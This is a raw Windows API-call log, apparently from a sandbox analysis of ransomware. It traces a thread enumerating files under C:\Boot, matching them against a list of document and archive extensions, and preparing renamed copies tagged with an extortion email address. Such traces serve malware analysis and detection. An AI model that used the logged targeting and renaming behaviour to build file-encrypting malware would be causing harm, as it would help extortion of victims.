hHeap=0x680000) returned 1 [0186.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0186.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 Thread: id = 94 os_tid = 0xa8c [0178.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c70958 [0178.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c80960 [0178.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde98 [0178.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c190 [0178.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddeb0 [0178.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x3f3a020 [0178.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddec8 [0178.078] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddec8, Size=0x20) returned 0x6beea8 [0178.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddec8 [0178.078] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddec8, Size=0x20) returned 0x6bef48 [0178.078] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.079] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.079] Wow64DisableWow64FsRedirection (in: OldValue=0x34dff50 | out: OldValue=0x34dff50*=0x0) returned 1 [0178.079] lstrlenW (lpString="kernel32.dll") returned 12 [0178.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.079] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.079] Sleep (dwMilliseconds=0x64) [0178.315] Sleep (dwMilliseconds=0x64) [0178.572] lstrlenW (lpString="BCD") returned 3 [0178.572] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.572] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.572] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.572] lstrlenW (lpString=".doc") returned 4 [0178.572] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".docx") returned 5 [0178.573] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0178.573] lstrlenW (lpString=".pdf") returned 4 [0178.573] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".xls") returned 4 [0178.573] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".xlsx") returned 5 [0178.573] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0178.573] lstrlenW (lpString=".ppt") returned 4 [0178.573] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString=".zip") returned 4 [0178.573] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".rar") returned 4 [0178.573] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".bz2") returned 4 [0178.573] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString=".7z") returned 3 [0178.573] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString=".dbf") returned 4 [0178.573] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString=".1cd") returned 4 [0178.573] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString=".jpg") returned 4 [0178.573] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.573] lstrlenW (lpString=".doc") returned 4 [0178.574] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".docx") returned 5 [0178.574] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0178.574] lstrlenW (lpString=".pdf") returned 4 [0178.574] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".xls") returned 4 [0178.574] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".xlsx") returned 5 [0178.574] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0178.574] lstrlenW (lpString=".ppt") returned 4 [0178.574] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.574] lstrlenW (lpString=".zip") returned 4 [0178.574] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".rar") returned 4 [0178.574] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".bz2") returned 4 [0178.574] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString=".7z") returned 3 [0178.574] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0178.574] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.574] lstrlenW (lpString=".dbf") returned 4 [0178.574] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.574] lstrlenW (lpString=".1cd") returned 4 [0178.574] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0178.574] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0178.574] lstrlenW (lpString=".jpg") returned 4 [0178.574] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0178.574] lstrcmpiW (lpString1=".LOG1", lpString2=".bat") returned 1 [0178.575] lstrlenW (lpString="BCD.LOG1") returned 8 [0178.575] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.575] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=0) returned 1 [0178.575] CloseHandle (hObject=0x348) returned 1 [0178.575] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.575] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.575] lstrlenW (lpString=".doc") returned 4 [0178.575] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0178.575] lstrlenW (lpString=".docx") returned 5 [0178.575] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0178.575] lstrlenW (lpString=".pdf") returned 4 [0178.575] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0178.575] lstrlenW (lpString=".xls") returned 4 [0178.575] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0178.575] lstrlenW (lpString=".xlsx") returned 5 [0178.575] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0178.575] lstrlenW (lpString=".ppt") returned 4 [0178.575] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString=".zip") returned 4 [0178.576] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".rar") returned 4 [0178.576] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".bz2") returned 4 [0178.576] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".7z") returned 3 [0178.576] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString=".dbf") returned 4 [0178.576] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString=".1cd") returned 4 [0178.576] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString=".jpg") returned 4 [0178.576] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.576] lstrlenW (lpString=".doc") returned 4 [0178.576] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".docx") returned 5 [0178.576] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0178.576] lstrlenW (lpString=".pdf") returned 4 [0178.576] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".xls") returned 4 [0178.576] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0178.576] lstrlenW (lpString=".xlsx") returned 5 [0178.576] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0178.577] lstrlenW (lpString=".ppt") returned 4 [0178.577] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.577] lstrlenW (lpString=".zip") returned 4 [0178.577] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString=".rar") returned 4 [0178.577] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString=".bz2") returned 4 [0178.577] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString=".7z") returned 3 [0178.577] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0178.577] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.577] lstrlenW (lpString=".dbf") returned 4 [0178.577] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.577] lstrlenW (lpString=".1cd") returned 4 [0178.577] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0178.577] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0178.577] lstrlenW (lpString=".jpg") returned 4 [0178.577] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0178.577] lstrcmpiW (lpString1=".LOG2", lpString2=".bat") returned 1 [0178.578] lstrlenW (lpString="BCD.LOG2") returned 8 [0178.578] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.578] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=0) returned 1 [0178.578] CloseHandle (hObject=0x348) returned 1 [0178.578] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.578] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.578] lstrlenW (lpString=".doc") returned 4 [0178.578] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0178.578] lstrlenW (lpString=".docx") returned 5 [0178.578] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0178.578] lstrlenW (lpString=".pdf") returned 4 [0178.578] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0178.578] lstrlenW (lpString=".xls") returned 4 [0178.578] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0178.578] lstrlenW (lpString=".xlsx") returned 5 [0178.579] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0178.579] lstrlenW (lpString=".ppt") returned 4 [0178.579] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString=".zip") returned 4 [0178.579] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString=".rar") returned 4 [0178.579] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString=".bz2") returned 4 [0178.579] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString=".7z") returned 3 [0178.579] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString=".dbf") returned 4 [0178.579] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString=".1cd") returned 4 [0178.579] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString=".jpg") returned 4 [0178.579] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.579] lstrlenW (lpString=".doc") returned 4 [0178.580] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0178.580] lstrlenW (lpString=".docx") returned 5 [0178.580] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0178.580] lstrlenW (lpString=".pdf") returned 4 [0178.580] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0178.580] lstrlenW (lpString=".xls") returned 4 [0178.580] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0178.580] lstrlenW (lpString=".xlsx") returned 5 [0178.580] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0178.580] lstrlenW (lpString=".ppt") returned 4 [0178.581] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.581] lstrlenW (lpString=".zip") returned 4 [0178.581] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString=".rar") returned 4 [0178.581] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString=".bz2") returned 4 [0178.581] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString=".7z") returned 3 [0178.581] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0178.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.581] lstrlenW (lpString=".dbf") returned 4 [0178.581] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.581] lstrlenW (lpString=".1cd") returned 4 [0178.581] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0178.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0178.581] lstrlenW (lpString=".jpg") returned 4 [0178.581] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0178.581] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.581] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0178.582] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.582] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=77664) returned 1 [0178.582] CloseHandle (hObject=0x348) returned 1 [0178.582] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0178.582] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.582] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.582] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.582] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.582] lstrlenW (lpString=".doc") returned 4 [0178.582] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.582] lstrlenW (lpString=".docx") returned 5 [0178.583] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.583] lstrlenW (lpString=".pdf") returned 4 [0178.583] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.583] lstrlenW (lpString=".xls") returned 4 [0178.583] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.583] lstrlenW (lpString=".xlsx") returned 5 [0178.583] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.583] lstrlenW (lpString=".ppt") returned 4 [0178.583] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.583] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.583] lstrlenW (lpString=".zip") returned 4 [0178.583] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.583] lstrlenW (lpString=".rar") returned 4 [0178.583] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.583] lstrlenW (lpString=".bz2") returned 4 [0178.583] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.583] lstrlenW (lpString=".7z") returned 3 [0178.583] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.583] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.583] lstrlenW (lpString=".dbf") returned 4 [0178.583] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.583] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.583] lstrlenW (lpString=".1cd") returned 4 [0178.583] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.583] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.583] lstrlenW (lpString=".jpg") returned 4 [0178.583] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.584] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.584] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.584] lstrlenW (lpString=".doc") returned 4 [0178.584] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.584] lstrlenW (lpString=".docx") returned 5 [0178.584] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.584] lstrlenW (lpString=".pdf") returned 4 [0178.584] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.584] lstrlenW (lpString=".xls") returned 4 [0178.584] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.584] lstrlenW (lpString=".xlsx") returned 5 [0178.584] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.584] lstrlenW (lpString=".ppt") returned 4 [0178.584] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.584] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.584] lstrlenW (lpString=".zip") returned 4 [0178.584] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.584] lstrlenW (lpString=".rar") returned 4 [0178.584] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.584] lstrlenW (lpString=".bz2") returned 4 [0178.584] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.584] lstrlenW (lpString=".7z") returned 3 [0178.584] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.584] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.584] lstrlenW (lpString=".dbf") returned 4 [0178.584] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.585] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.585] lstrlenW (lpString=".1cd") returned 4 [0178.585] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.585] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0178.585] lstrlenW (lpString=".jpg") returned 4 [0178.585] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.585] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.585] lstrlenW (lpString="bootspaces.dll") returned 14 [0178.585] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.585] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=95648) returned 1 [0178.585] CloseHandle (hObject=0x348) returned 1 [0178.586] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0178.586] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.586] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.586] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.586] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.586] lstrlenW (lpString=".doc") returned 4 [0178.586] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.586] lstrlenW (lpString=".docx") returned 5 [0178.586] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0178.586] lstrlenW (lpString=".pdf") returned 4 [0178.586] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.586] lstrlenW (lpString=".xls") returned 4 [0178.586] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.586] lstrlenW (lpString=".xlsx") returned 5 [0178.586] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0178.586] lstrlenW (lpString=".ppt") returned 4 [0178.586] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.586] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.586] lstrlenW (lpString=".zip") returned 4 [0178.586] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.586] lstrlenW (lpString=".rar") returned 4 [0178.586] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.587] lstrlenW (lpString=".bz2") returned 4 [0178.587] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.587] lstrlenW (lpString=".7z") returned 3 [0178.587] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.587] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.587] lstrlenW (lpString=".dbf") returned 4 [0178.587] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.587] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.587] lstrlenW (lpString=".1cd") returned 4 [0178.587] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.587] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.587] lstrlenW (lpString=".jpg") returned 4 [0178.587] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.587] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.587] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.587] lstrlenW (lpString=".doc") returned 4 [0178.587] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.587] lstrlenW (lpString=".docx") returned 5 [0178.587] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0178.587] lstrlenW (lpString=".pdf") returned 4 [0178.587] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.587] lstrlenW (lpString=".xls") returned 4 [0178.587] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.587] lstrlenW (lpString=".xlsx") returned 5 [0178.587] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0178.588] lstrlenW (lpString=".ppt") returned 4 [0178.588] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.588] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0178.588] lstrlenW (lpString=".zip") returned 4 